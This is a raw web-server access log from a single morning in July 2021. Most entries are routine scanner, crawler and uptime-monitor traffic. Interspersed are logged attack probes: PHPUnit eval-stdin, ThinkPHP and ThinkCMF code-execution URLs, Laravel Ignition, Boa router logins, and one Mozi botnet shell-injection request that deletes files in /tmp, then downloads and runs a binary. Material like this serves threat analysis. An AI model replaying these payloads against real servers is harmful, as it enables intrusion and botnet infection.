185.53.90.90 - - [04/Jul/2021:05:49:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:05:49:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:05:50:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:05:50:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:05:50:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
167.248.133.40 - - [04/Jul/2021:05:53:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.40 - - [04/Jul/2021:05:53:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
103.145.13.121 - - [04/Jul/2021:05:53:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
117.196.237.162 - - [04/Jul/2021:06:03:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.53.90.90 - - [04/Jul/2021:06:04:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:06:04:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:06:05:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:06:05:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:06:05:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:06:05:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:06:06:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:06:06:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:06:07:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.53.90.90 - - [04/Jul/2021:06:07:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
203.189.153.179 - - [04/Jul/2021:06:14:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
209.141.49.75 - - [04/Jul/2021:06:19:32 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.146.164.110 - - [04/Jul/2021:06:22:43 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:22:43 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:22:45 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:22:54 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:22:54 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:22:54 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:22:54 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:22:55 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:22:55 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:07 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:07 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:07 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:12 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:13 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:13 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:16 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:16 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:16 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:17 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:17 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:17 +0200] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:17 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:17 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:17 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:17 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:17 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:22 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:22 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:22 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:22 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:22 +0200] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:22 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:22 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:24 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:24 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:24 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:24 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:40 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:40 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:40 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:41 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:48 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:49 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:56 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:56 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:56 +0200] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:56 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:57 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:57 +0200] "GET /console/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:57 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:58 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.164.110 - - [04/Jul/2021:06:23:58 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
61.242.40.74 - - [04/Jul/2021:06:42:27 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
66.240.205.34 - - [04/Jul/2021:06:44:51 +0200] "Gh0st\xad" 501 321 "-" "-"
196.2.15.107 - - [04/Jul/2021:06:49:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
27.38.61.80 - - [04/Jul/2021:06:51:18 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
89.248.165.240 - - [04/Jul/2021:06:56:33 +0200] "\x03" 501 316 "-" "-"
66.249.64.46 - - [04/Jul/2021:06:57:25 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.46 - - [04/Jul/2021:06:57:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
37.187.110.9 - - [04/Jul/2021:06:58:21 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 332 "-" "Go-http-client/1.1"
37.187.110.9 - - [04/Jul/2021:06:58:21 +0200] "GET /security.txt HTTP/1.1" 404 320 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Jul/2021:07:00:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:01:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.79.107.251 - - [04/Jul/2021:07:02:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
212.91.246.72 - - [04/Jul/2021:07:02:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:03:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.100.8.60 - - [04/Jul/2021:07:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:07:04:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:05:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:06:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.90.225.218 - - [04/Jul/2021:07:07:29 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [04/Jul/2021:07:07:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:08:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.40.4.126 - - [04/Jul/2021:07:09:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2021:07:09:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:10:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.40.4.126 - - [04/Jul/2021:07:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2021:07:11:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:12:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.74.151.207 - - [04/Jul/2021:07:13:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:07:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.121.139.159 - - [04/Jul/2021:07:14:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:07:14:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.40.4.126 - - [04/Jul/2021:07:15:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
159.65.69.107 - - [04/Jul/2021:07:15:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:07:15:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:16:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
189.127.145.147 - - [04/Jul/2021:07:16:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:07:17:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.40.4.126 - - [04/Jul/2021:07:18:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2021:07:18:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.40.4.126 - - [04/Jul/2021:07:19:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2021:07:19:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:20:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:21:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:22:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:23:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:24:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.49.75 - - [04/Jul/2021:07:25:20 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Jul/2021:07:25:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.49.75 - - [04/Jul/2021:07:26:02 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Jul/2021:07:26:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:27:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:28:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:29:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:07:30:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
